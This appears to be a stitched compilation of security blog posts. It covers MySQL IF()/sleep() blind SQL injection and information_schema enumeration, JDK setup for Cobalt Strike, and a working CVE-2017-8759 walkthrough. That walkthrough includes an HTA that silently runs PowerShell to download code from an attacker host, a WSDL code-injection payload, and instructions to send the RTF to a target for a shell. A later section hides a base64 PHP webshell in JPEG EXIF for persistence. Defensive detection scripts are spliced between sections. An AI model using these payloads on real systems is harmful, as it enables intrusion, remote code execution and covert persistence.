
Usage scenarios

  1. Typically used in blind SQL injection or time-based injection.
  2. When the comma is not filtered.

    If the injection point filters commas, the CASE expression can be used to get around that; see "The CASE expression in SQL injection".

The IF expression in MySQL

Definition reference

  1. Official reference: MySQL IF expression reference

  2. Syntax

    ```sql
    IF(expr1,expr2,expr3)
    ```
  3. Return value
    3.1 If expr1 is not equal to 0 and expr1 is not NULL, the whole expression evaluates to expr2; otherwise it evaluates to expr3.
    3.2 If only one of expr2 and expr3 is NULL, the return type of the whole IF() expression is the type of the non-NULL expression.
    3.3 The default return type follows these rules:

    - If `expr2` or `expr3` produces a `string`, the return value is a `string`;
    - If `expr2` and `expr3` are both `string` and either of them is case-sensitive, the return value is also case-sensitive;
    - If `expr2` or `expr3` produces a floating-point value, the result is a floating-point value;
    - If `expr2` or `expr3` produces an integer, the result is an integer.

## Example

```
mysql> select if(1<0,sleep(5),sleep(2));
+---------------------------+
| if(1<0,sleep(5),sleep(2)) |
+---------------------------+
|                         0 |
+---------------------------+
1 row in set (2.00 sec)
```

The condition 1<0 is false, so only the sleep(2) branch runs and the query takes about 2 seconds; in a time-based blind injection that measurable delay is what reveals the truth value of expr1.
## Introduction
The information_schema database is a virtual database that appears in MySQL versions after 5.0; it does not exist physically.
information_schema works like a "data dictionary": it provides a way to access the database's metadata, that is, data about the data, such as database and table names, column types, and access privileges (in a more fine-grained form).
## All tables in information_schema at a glance

```
mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| OPTIMIZER_TRACE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
| INNODB_LOCKS |
| INNODB_TRX |
| INNODB_SYS_DATAFILES |
| INNODB_LOCK_WAITS |
| INNODB_SYS_TABLESTATS |
| INNODB_CMP |
| INNODB_METRICS |
| INNODB_CMP_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMPMEM_RESET |
| INNODB_FT_DELETED |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_INDEXES |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_SYS_FIELDS |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_BUFFER_PAGE |
| INNODB_CMPMEM |
| INNODB_FT_INDEX_TABLE |
| INNODB_FT_BEING_DELETED |
| INNODB_SYS_TABLESPACES |
| INNODB_FT_INDEX_CACHE |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_TABLES |
| INNODB_BUFFER_POOL_STATS |
| INNODB_FT_CONFIG |
+---------------------------------------+
59 rows in set (0.00 sec)
```

There are 59 tables in total, but during SQL injection we mainly use 7 of them, and the most important are the three tables SCHEMATA, TABLES and COLUMNS.
## Important table structures
### The SCHEMATA table
information_schema.SCHEMATA provides information about all databases in the current MySQL instance; it is what the `show databases` result comes from.

```
mysql> select * from information_schema.schemata;
+--------------+--------------------+----------------------------+------------------------+----------+
| CATALOG_NAME | SCHEMA_NAME        | DEFAULT_CHARACTER_SET_NAME | DEFAULT_COLLATION_NAME | SQL_PATH |
+--------------+--------------------+----------------------------+------------------------+----------+
| def          | information_schema | utf8                       | utf8_general_ci        | NULL     |
| def          | mysql              | latin1                     | latin1_swedish_ci      | NULL     |
| def          | performance_schema | utf8                       | utf8_general_ci        | NULL     |
| def          | test               | latin1                     | latin1_swedish_ci      | NULL     |
+--------------+--------------------+----------------------------+------------------------+----------+
4 rows in set (0.00 sec)

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| test               |
+--------------------+
4 rows in set (0.00 sec)
```

### The TABLES table
information_schema.TABLES provides information about the tables in a database (including views); it is what the `show tables from [schemaname]` result comes from.

```
mysql> desc information_schema.tables;
+-----------------+---------------------+------+-----+---------+-------+
| Field           | Type                | Null | Key | Default | Extra |
+-----------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG   | varchar(512)        | NO   |     |         |       |
| TABLE_SCHEMA    | varchar(64)         | NO   |     |         |       |
| TABLE_NAME      | varchar(64)         | NO   |     |         |       |
| TABLE_TYPE      | varchar(64)         | NO   |     |         |       |
| ENGINE          | varchar(64)         | YES  |     | NULL    |       |
| VERSION         | bigint(21) unsigned | YES  |     | NULL    |       |
| ROW_FORMAT      | varchar(10)         | YES  |     | NULL    |       |
| TABLE_ROWS      | bigint(21) unsigned | YES  |     | NULL    |       |
| AVG_ROW_LENGTH  | bigint(21) unsigned | YES  |     | NULL    |       |
| DATA_LENGTH     | bigint(21) unsigned | YES  |     | NULL    |       |
| MAX_DATA_LENGTH | bigint(21) unsigned | YES  |     | NULL    |       |
| INDEX_LENGTH    | bigint(21) unsigned | YES  |     | NULL    |       |
| DATA_FREE       | bigint(21) unsigned | YES  |     | NULL    |       |
| AUTO_INCREMENT  | bigint(21) unsigned | YES  |     | NULL    |       |
| CREATE_TIME     | datetime            | YES  |     | NULL    |       |
| UPDATE_TIME     | datetime            | YES  |     | NULL    |       |
| CHECK_TIME      | datetime            | YES  |     | NULL    |       |
| TABLE_COLLATION | varchar(32)         | YES  |     | NULL    |       |
| CHECKSUM        | bigint(21) unsigned | YES  |     | NULL    |       |
| CREATE_OPTIONS  | varchar(255)        | YES  |     | NULL    |       |
| TABLE_COMMENT   | varchar(2048)       | NO   |     |         |       |
+-----------------+---------------------+------+-----+---------+-------+
21 rows in set (0.01 sec)
```

Here table_schema is the database name, table_name is the table name, and table_rows is the number of data rows in that table.
To list all tables of the database named mysql through information_schema:

```
mysql> select * from information_schema.tables where table_schema='mysql';
+---------------+--------------+---------------------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-------------------+----------+--------------------+-----------------------------------------+
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | ROW_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_LENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME | UPDATE_TIME | CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+---------------------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-------------------+----------+--------------------+-----------------------------------------+
| def | mysql | columns_priv | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 227994731135631359 | 4096 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_bin | NULL | | Column privileges |
| def | mysql | db | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 123848989752688639 | 2048 | 0 | NULL | 2016-08-30 19:14:48 | 2016-08-30 19:14:48 | NULL | utf8_bin | NULL | | Database privileges |
| def | mysql | event | BASE TABLE | MyISAM | 10 | Dynamic | 0 | 0 | 0 | 281474976710655 | 2048 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Events |
| def | mysql | func | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 162974011515469823 | 1024 | 0 | NULL | 2016-08-30 19:14:48 | 2016-08-30 19:14:48 | NULL | utf8_bin | NULL | | User defined functions |
| def | mysql | general_log | BASE TABLE | CSV | 10 | Dynamic | 2 | 0 | 0 | 0 | 0 | 0 | NULL | NULL | NULL | NULL | utf8_general_ci | NULL | | General log |
| def | mysql | help_category | BASE TABLE | MyISAM | 10 | Dynamic | 40 | 28 | 1120 | 281474976710655 | 3072 | 0 | NULL | 2016-08-30 19:14:53 | 2016-08-30 19:14:53 | NULL | utf8_general_ci | NULL | | help categories |
| def | mysql | help_keyword | BASE TABLE | MyISAM | 10 | Fixed | 611 | 197 | 120367 | 55450570411999231 | 21504 | 0 | NULL | 2016-08-30 19:14:53 | 2016-08-30 19:14:53 | NULL | utf8_general_ci | NULL | | help keywords |
| def | mysql | help_relation | BASE TABLE | MyISAM | 10 | Fixed | 1218 | 9 | 10962 | 2533274790395903 | 21504 | 0 | NULL | 2016-08-30 19:14:53 | 2016-08-30 19:14:53 | NULL | utf8_general_ci | NULL | | keyword-topic relation |
| def | mysql | help_topic | BASE TABLE | MyISAM | 10 | Dynamic | 583 | 975 | 568664 | 281474976710655 | 22528 | 0 | NULL | 2016-08-30 19:14:53 | 2016-08-30 19:14:53 | NULL | utf8_general_ci | NULL | | help topics |
| def | mysql | innodb_index_stats | BASE TABLE | InnoDB | 10 | Compact | 3 | 5461 | 16384 | 0 | 0 | 0 | NULL | 2017-04-19 16:55:05 | NULL | NULL | utf8_bin | NULL | stats_persistent=0 | |
| def | mysql | innodb_table_stats | BASE TABLE | InnoDB | 10 | Compact | 1 | 16384 | 16384 | 0 | 0 | 0 | NULL | 2017-04-19 16:55:05 | NULL | NULL | utf8_bin | NULL | stats_persistent=0 | |
| def | mysql | ndb_binlog_index | BASE TABLE | MyISAM | 10 | Dynamic | 0 | 0 | 0 | 281474976710655 | 1024 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | latin1_swedish_ci | NULL | | |
| def | mysql | plugin | BASE TABLE | MyISAM | 10 | Dynamic | 0 | 0 | 0 | 281474976710655 | 1024 | 0 | NULL | 2016-08-30 19:14:48 | 2016-08-30 19:14:48 | NULL | utf8_general_ci | NULL | | MySQL plugins |
| def | mysql | proc | BASE TABLE | MyISAM | 10 | Dynamic | 0 | 0 | 0 | 281474976710655 | 2048 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Stored Procedures |
| def | mysql | procs_priv | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 239253730204057599 | 4096 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_bin | NULL | | Procedure privileges |
| def | mysql | proxies_priv | BASE TABLE | MyISAM | 10 | Fixed | 2 | 693 | 1386 | 195062158860484607 | 5120 | 0 | NULL | 2016-08-30 19:14:53 | 2016-08-30 19:14:53 | 2016-08-30 19:14:53 | utf8_bin | NULL | | User proxy privileges |
| def | mysql | servers | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 433752939111120895 | 1024 | 0 | NULL | 2016-08-30 19:14:48 | 2016-08-30 19:14:48 | NULL | utf8_general_ci | NULL | | MySQL Foreign Servers table |
| def | mysql | slave_master_info | BASE TABLE | InnoDB | 10 | Compact | 0 | 0 | 16384 | 0 | 0 | 0 | NULL | 2017-04-19 16:55:05 | NULL | NULL | utf8_general_ci | NULL | stats_persistent=0 | Master Information |
| def | mysql | slave_relay_log_info | BASE TABLE | InnoDB | 10 | Compact | 0 | 0 | 16384 | 0 | 0 | 0 | NULL | 2017-04-19 16:55:05 | NULL | NULL | utf8_general_ci | NULL | stats_persistent=0 | Relay Log Information |
| def | mysql | slave_worker_info | BASE TABLE | InnoDB | 10 | Compact | 0 | 0 | 16384 | 0 | 0 | 0 | NULL | 2017-04-19 16:55:05 | NULL | NULL | utf8_general_ci | NULL | stats_persistent=0 | Worker Information |
| def | mysql | slow_log | BASE TABLE | CSV | 10 | Dynamic | 2 | 0 | 0 | 0 | 0 | 0 | NULL | NULL | NULL | NULL | utf8_general_ci | NULL | | Slow log |
| def | mysql | tables_priv | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 239535205180768255 | 4096 | 0 | NULL | 2016-08-30 19:14:48 | 2016-08-30 19:14:48 | NULL | utf8_bin | NULL | | Table privileges |
| def | mysql | time_zone | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 1970324836974591 | 1024 | 0 | 1 | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Time zones |
| def | mysql | time_zone_leap_second | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 3659174697238527 | 1024 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Leap seconds information for time zones |
| def | mysql | time_zone_name | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 55450570411999231 | 1024 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Time zone names |
| def | mysql | time_zone_transition | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 4785074604081151 | 1024 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Time zone transitions |
| def | mysql | time_zone_transition_type | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 10696049115004927 | 1024 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Time zone transition types |
| def | mysql | user | BASE TABLE | MyISAM | 10 | Dynamic | 5 | 70 | 352 | 281474976710655 | 2048 | 0 | NULL | 2016-08-30 19:14:48 | 2016-08-30 19:14:55 | NULL | utf8_bin | NULL | | Users and global privileges |
+---------------+--------------+---------------------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-------------------+----------+--------------------+-----------------------------------------+
28 rows in set (0.00 sec)
```

### The COLUMNS table
information_schema.COLUMNS provides information about the columns in tables: it describes every column of a given table and the details of each column; it is what the `show columns from [schemaname].[tablename]` result comes from.

```
mysql> desc information_schema.COLUMNS;
+--------------------------+---------------------+------+-----+---------+-------+
| Field                    | Type                | Null | Key | Default | Extra |
+--------------------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG            | varchar(512)        | NO   |     |         |       |
| TABLE_SCHEMA             | varchar(64)         | NO   |     |         |       |
| TABLE_NAME               | varchar(64)         | NO   |     |         |       |
| COLUMN_NAME              | varchar(64)         | NO   |     |         |       |
| ORDINAL_POSITION         | bigint(21) unsigned | NO   |     | 0       |       |
| COLUMN_DEFAULT           | longtext            | YES  |     | NULL    |       |
| IS_NULLABLE              | varchar(3)          | NO   |     |         |       |
| DATA_TYPE                | varchar(64)         | NO   |     |         |       |
| CHARACTER_MAXIMUM_LENGTH | bigint(21) unsigned | YES  |     | NULL    |       |
| CHARACTER_OCTET_LENGTH   | bigint(21) unsigned | YES  |     | NULL    |       |
| NUMERIC_PRECISION        | bigint(21) unsigned | YES  |     | NULL    |       |
| NUMERIC_SCALE            | bigint(21) unsigned | YES  |     | NULL    |       |
| DATETIME_PRECISION       | bigint(21) unsigned | YES  |     | NULL    |       |
| CHARACTER_SET_NAME       | varchar(32)         | YES  |     | NULL    |       |
| COLLATION_NAME           | varchar(32)         | YES  |     | NULL    |       |
| COLUMN_TYPE              | longtext            | NO   |     | NULL    |       |
| COLUMN_KEY               | varchar(3)          | NO   |     |         |       |
| EXTRA                    | varchar(30)         | NO   |     |         |       |
| PRIVILEGES               | varchar(80)         | NO   |     |         |       |
| COLUMN_COMMENT           | varchar(1024)       | NO   |     |         |       |
+--------------------------+---------------------+------+-----+---------+-------+
20 rows in set (0.00 sec)
```
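The two posts above describe the IF()/sleep() primitive and the information_schema tables an injection relies on; the following Python is a defender's log check for both, added here and not part of either post. It assumes Apache combined-format access log lines with the request duration in microseconds appended (Apache's %D directive); the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: Apache combined-format lines with the request duration in
# microseconds appended (what Apache's %D directive logs). Not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Sep/2017:12:25:39 +0800] "GET /item.php?id=7 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 1830
10.0.0.9 - - [28/Sep/2017:12:25:41 +0800] "GET /item.php?id=7+and+if(1%3C0%2Csleep(5)%2Csleep(2)) HTTP/1.1" 200 512 "-" "python-requests/2.18" 2004113
10.0.0.9 - - [28/Sep/2017:12:25:45 +0800] "GET /item.php?id=7+union+select+table_name+from+information_schema.tables+where+table_schema%3D%27mysql%27 HTTP/1.1" 200 890 "-" "python-requests/2.18" 2417
10.0.0.9 - - [28/Sep/2017:12:25:50 +0800] "GET /item.php?id=7+and+if(1%253D1%252Csleep(5)%252C0) HTTP/1.1" 200 512 "-" "python-requests/2.18" 5003211
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "[^"]*" "[^"]*" (?P<us>\d+)$')
SLEEP_RE = re.compile(r'\bsleep\s*\(\s*(\d+)', re.I)
IF_RE = re.compile(r'\bif\s*\(', re.I)
SCHEMA_RE = re.compile(
    r'\binformation_schema\s*\.\s*(schemata|tables|columns)\b', re.I)


def classify(line):
    """Return a finding dict for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice so a double-encoded query (%252C for a comma) is still seen.
    query = unquote_plus(unquote_plus(m['path']))
    kinds = []
    delays = [int(s) for s in SLEEP_RE.findall(query)]
    if delays and IF_RE.search(query):
        kinds.append('time-based IF()')
    for table in SCHEMA_RE.findall(query):
        kinds.append('information_schema.%s enumeration' % table.upper())
    if not kinds:
        return None
    seconds = int(m['us']) / 1_000_000
    # IF() evaluates only one branch, so the shortest sleep() argument is the
    # lower bound the response must have taken for the delay to have run.
    confirmed = bool(delays) and seconds >= min(delays)
    return {'ip': m['ip'], 'kinds': kinds, 'seconds': round(seconds, 2),
            'confirmed_delay': confirmed}


def scan(log_text):
    """Classify every line of a log and keep the non-empty findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A request that carries sleep(N) and really took at least N seconds is the one worth alerting on first: the database executed the delay, so the injection point is live.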
## Requirement
Running Cobalt Strike on OpenJDK is unstable, and at startup it warns that OpenJDK is not recommended.

## Update steps

  1. Download JDK 1.7; this version is fairly stable as far as Cobalt Strike is concerned. I found the download address once and then could never find it again, not sure why. A Baidu Netdisk link for JDK 1.7 is given at the end.

  2. Unpack the downloaded jdk1.7.

  3. Create jdk17 under /usr/lib/jvm and move the unpacked directory into it.

  4. Run the following three commands to install JDK 1.7:

    ```sh
    update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk17/bin/java 1
    update-alternatives --install /usr/bin/javac javac /usr/lib/jvm/jdk17/bin/javac 1
    update-alternatives --install /usr/bin/jar jar /usr/lib/jvm/jdk17/bin/jar 1
    ```
  5. Set JDK 1.7 as the default java:

    ```
    update-alternatives --config java
    There are 2 choices for the alternative java (providing /usr/bin/java).

      Selection    Path                                             Priority   Status
    ------------------------------------------------------------
    * 0            /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java   1081       auto mode
      1            /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java   1081       manual mode
      2            /usr/lib/jvm/jdk17/bin/java                      1          manual mode
    ```

    Choose 2. Done.

## Screenshots
jdk2.png

jdk.png

## JDK 1.7 download
JDK7 Baidu Netdisk


The main reference is this article by Lz1y: http://www.lz1y.cn/wordpress/?p=799

Change log:

Last modified: 28 September 2017

## Tools

  1. https://github.com/Lz1y/CVE-2017-8759.git
  2. Cobalt Strike (download it yourself)

## Steps

  1. On Kali, run:
    git clone https://github.com/Lz1y/CVE-2017-8759.git
  2. Go into the Cobalt Strike directory and run:
    ./teamserver 192.168.1.9 123456
  3. In the Cobalt Strike directory, run ./cobaltstrike to start the Cobalt Strike client.
  4. In Cobalt Strike, create a new Listener of type http with port 80.
  5. Go into that directory and edit the following files in turn:
    5.1 gedit cmd.jpg (first cp cmd.hta cmd.jpg)

    ```html
    <html>
    <head>
    <script language="VBScript">
    Sub window_onload
    window.resizeTo 0,0
    window.MoveTo -100,-100
    const impersonation = 3
    Const HIDDEN_WINDOW = 12
    Set Locator = CreateObject("WScript.Shell")
    Locator.Run"powershell.exe -nop -w hidden -c ""IEX (new-object net.webclient).downloadstring('http://192.168.1.9:80/a')""",0,FALSE
    window.close()
    end sub
    </script>
    <!--

    <script language="VBScript">
    Sub window_onload
    const impersonation = 3
    Const HIDDEN_WINDOW = 12
    Set Locator = CreateObject("WbemScripting.SWbemLocator")
    Set Service = Locator.ConnectServer()
    Service.Security_.ImpersonationLevel=impersonation
    Set objStartup = Service.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set Process = Service.Get("Win32_Process")
    Error = Process.Create("powershell.exe -nop -w hidden calc.exe", null, objConfig, intProcessID)
    window.close()
    end sub
    </script>
    -->
    </head>
    </html>
    ```
    微信截图_20170927155342.png
    5.2 gedit exploit.txt

    ```xml
    <definitions
    xmlns="http://schemas.xmlsoap.org/wsdl/"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
    xmlns:suds="http://www.w3.org/2000/wsdl/suds"
    xmlns:tns="http://schemas.microsoft.com/clr/ns/System"
    xmlns:ns0="http://schemas.microsoft.com/clr/nsassem/Logo/Logo">
    <portType name="PortType"/>
    <binding name="Binding" type="tns:PortType">
    <soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
    <suds:class type="ns0:Image" rootType="MarshalByRefObject"></suds:class>
    </binding>
    <service name="Service">
    <port name="Port" binding="tns:Binding">
    <soap:address location="http://192.168.1.9?C:\Windows\System32\mshta.exe?http://192.168.1.9/cmd.jpg"/>
    <soap:address location=";
    if (System.AppDomain.CurrentDomain.GetData(_url.Split('?')[0]) == null) {
    System.Diagnostics.Process.Start(_url.Split('?')[1], _url.Split('?')[2]);
    System.AppDomain.CurrentDomain.SetData(_url.Split('?')[0], true);
    } //"/>
    </port>
    </service>
    </definitions>
    ```
    微信截图_20170927155425.png
    The changes to the two files above must match the Cobalt Strike setup.
  6. Set up the attack environment:
    6.1 Attacks -> Web Drive-by -> Scripted Web Delivery: start a PowerShell payload, configured as shown below:
    微信截图_20170928122539.png
    After clicking "Launch", a one-line PowerShell command is generated; note its URL part and put it into cmd.jpg in place of the url.
    6.2 Attacks -> Web Drive-by -> Host File: host cmd.jpg, and be sure to change the Mime Type to application/hta; the URL generated here goes into the corresponding place in exploit.txt.
    6.3 Attacks -> Web Drive-by -> Host File: host exploit.txt with no special settings, set the Local URI, click Launch and copy the generated URL. This URL is what the -u parameter of the CreateRTF.py script takes.
    6.4 Use Lz1y's CreatRTF.py to generate an RTF document, with the url set to the URL produced when hosting exploit.txt.

With that the steps are complete: send the generated RTF document to the target and you get a shell on the Cobalt Strike teamserver.
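As an added defensive check, not from the original post or Lz1y's repository: the following Python parses a WSDL and flags soap:address location values with the shape exploit.txt relies on (a second address whose value is C# rather than a URL, or a URL wrapping a local executable path). Both WSDL samples are constructed.

```python
import re
import xml.etree.ElementTree as ET

SOAP_ADDRESS = '{http://schemas.xmlsoap.org/wsdl/soap/}address'
# Tokens that never belong in a service URL but show up when the attribute is
# used to smuggle C# into the proxy source that the WSDL importer generates.
CODE_MARKERS = ('System.', 'Process.Start', 'AppDomain', 'Split(', '{', '}', ';')
PLAIN_URL = re.compile(r'^https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/\S*)?$')
LOCAL_EXE = re.compile(r'[A-Za-z]:\\[^?"\s]*\.exe', re.I)


def inspect_location(value, siblings):
    """Reasons why one soap:address location value looks like an injection."""
    reasons = []
    if siblings > 1:
        reasons.append('%d soap:address elements in one port' % siblings)
    hits = [m for m in CODE_MARKERS if m in value]
    if hits:
        reasons.append('C# code markers: ' + ', '.join(hits))
    if LOCAL_EXE.search(value):
        reasons.append('local executable path embedded in the URL')
    if not PLAIN_URL.match(value.strip()):
        reasons.append('not a plain http(s) URL')
    return reasons


def check_wsdl(wsdl_text):
    """Return [(location, reasons)] for every suspicious soap:address."""
    findings = []
    for parent in ET.fromstring(wsdl_text).iter():
        addrs = [e for e in parent if e.tag == SOAP_ADDRESS]
        for addr in addrs:
            loc = addr.get('location', '')
            reasons = inspect_location(loc, len(addrs))
            if reasons:
                findings.append((loc, reasons))
    return findings


_HEAD = ('<definitions xmlns="http://schemas.xmlsoap.org/wsdl/" '
         'xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/">'
         '<service name="Service"><port name="Port" binding="Binding">')
_TAIL = '</port></service></definitions>'
# Constructed benign WSDL: one well-formed service URL.
BENIGN_WSDL = _HEAD + '<soap:address location="http://example.invalid/Service"/>' + _TAIL
# Constructed sample shaped like the exploit.txt above: a second soap:address
# whose value opens with ';' and carries a C# statement instead of a URL.
INJECTED_WSDL = _HEAD + (
    '<soap:address location="http://example.invalid?C:\\Windows\\System32\\mshta.exe'
    '?http://example.invalid/cmd.jpg"/>'
    '<soap:address location=";\n  System.Diagnostics.Process.Start(_url.Split(\'?\')[1]); //"/>'
) + _TAIL

if __name__ == '__main__':
    for location, reasons in check_wsdl(INJECTED_WSDL):
        print(repr(location), reasons)
```

Run it over WSDL documents fetched by a mail gateway or proxy; a service port with two soap:address elements, one of them not a URL, has no legitimate reason to exist.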

## Notes

## Purpose
Common WebShells are fairly easy to identify; hiding the WebShell in a picture's EXIF data keeps it concealed, which helps with persistence. (Of course this is not the best persistence method, but it can be tried as a temporary one.)

## Tools

  1. ExifTool
  2. A one-line webshell
  3. China Chopper client
  4. A picture

## Steps

  1. Get a picture you like from Baidu
    skipped

  2. Install ExifTool
    2.1 Environment: Kali
    2.2 Command: apt-get install exiftool

  3. Write the one-line webshell into the picture
    Run:
    exiftool "-comment=<test.php timg.jpg"
    exiftool "-model=/.*/e" timg.jpg
    The string:
    aWYgKGlzc2V0KCRfUE9TVFsiY21kIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjbWQiXSkpO30=
    I won't paste what it decodes to; in short, the password is cmd.
    The result looks like this:
    微信截图_20170918185956.png
    You can see that our one-line webshell has been written into the picture's metadata.

  4. Modified one-line webshell

    ```php
    <?php
    // Read the picture's EXIF tags and hand the Model tag (a regex carrying
    // the /e modifier) to preg_replace(), with the Make tag as the replacement.
    $exif = exif_read_data('/www/web/phpshell_google_com/public_html/timg.jpg');
    preg_replace($exif['Model'], $exif['Make'], '');
    ?>
    ```
  5. GetShell
    微信截图_20170918191022.png
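A defensive counterpart, added here and not from the original post: the following Python walks the metadata segments of a JPEG and flags a comment or APPn block that holds PHP, base64 that decodes to PHP, or a bare regex with the /e modifier like the Model value written above. The sample images are constructed byte strings (the APP1 payload is a stand-in with tag strings only, not a valid TIFF structure) and the PHP placeholder is inert.

```python
import base64
import re
import struct

# JPEG segments that carry metadata: COM (comment) and the APPn blocks (EXIF/XMP).
METADATA_MARKERS = {0xFE: 'COM', **{0xE0 + i: 'APP%d' % i for i in range(16)}}
PHP_RE = re.compile(rb'<\?php|\beval\s*\(|\$_(?:POST|GET|REQUEST)\b|preg_replace\s*\(', re.I)
# A bare /.../e regex literal in a NUL-terminated string field (ordinary URLs do not match).
E_MODIFIER_RE = re.compile(rb'(?:^|\x00)/[^/\n]*/[a-z]*e[a-z]*(?:\x00|$)', re.I)
B64_RE = re.compile(rb'[A-Za-z0-9+/]{24,}={0,2}')


def jpeg_segments(data):
    """Yield (marker, payload) for each header segment up to SOS or EOI."""
    if data[:2] != b'\xff\xd8':
        raise ValueError('not a JPEG: missing SOI')
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError('expected a marker at offset %d' % pos)
        marker = data[pos + 1]
        if marker in (0xDA, 0xD9):  # SOS or EOI: no more metadata segments
            return
        length = struct.unpack('>H', data[pos + 2:pos + 4])[0]
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def scan_jpeg(data):
    """Return [(segment name, reasons)] for metadata that looks like a PHP loader target."""
    findings = []
    for marker, payload in jpeg_segments(data):
        name = METADATA_MARKERS.get(marker)
        if name is None:
            continue
        reasons = []
        if PHP_RE.search(payload):
            reasons.append('PHP code in segment')
        if E_MODIFIER_RE.search(payload):
            reasons.append('regex with /e modifier')
        for blob in B64_RE.findall(payload):
            try:
                decoded = base64.b64decode(blob, validate=True)
            except ValueError:
                continue
            if PHP_RE.search(decoded):
                reasons.append('base64-encoded PHP code')
                break
        if reasons:
            findings.append((name, reasons))
    return findings


def _segment(marker, payload):
    return b'\xff' + bytes([marker]) + struct.pack('>H', len(payload) + 2) + payload


# Constructed samples: SOI, metadata segments, then an SOS marker.
CLEAN_JPEG = b'\xff\xd8' + _segment(0xFE, b'Created with a camera') + b'\xff\xda\x00\x02'
SAMPLE_JPEG = (b'\xff\xd8'
               + _segment(0xFE, base64.b64encode(b'<?php /* constructed placeholder */ ?>'))
               + _segment(0xE1, b'Exif\x00\x00Make\x00/.*/e\x00Model\x00placeholder\x00')
               + b'\xff\xda\x00\x02')
```

Because the scanner never decodes the image, it can run over every upload at write time; a picture whose metadata needs a PHP loader is the anomaly, whatever the file extension says.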

Notes

[1] The picture path can be absolute or relative; if it is relative, don't forget the ./ prefix.
[2] Tested with PHP 5.5. As an expert pointed out, the /e option of preg_replace is abolished in versions above 5.6, although other functions can take its place. The idea is right; mind which function you use.
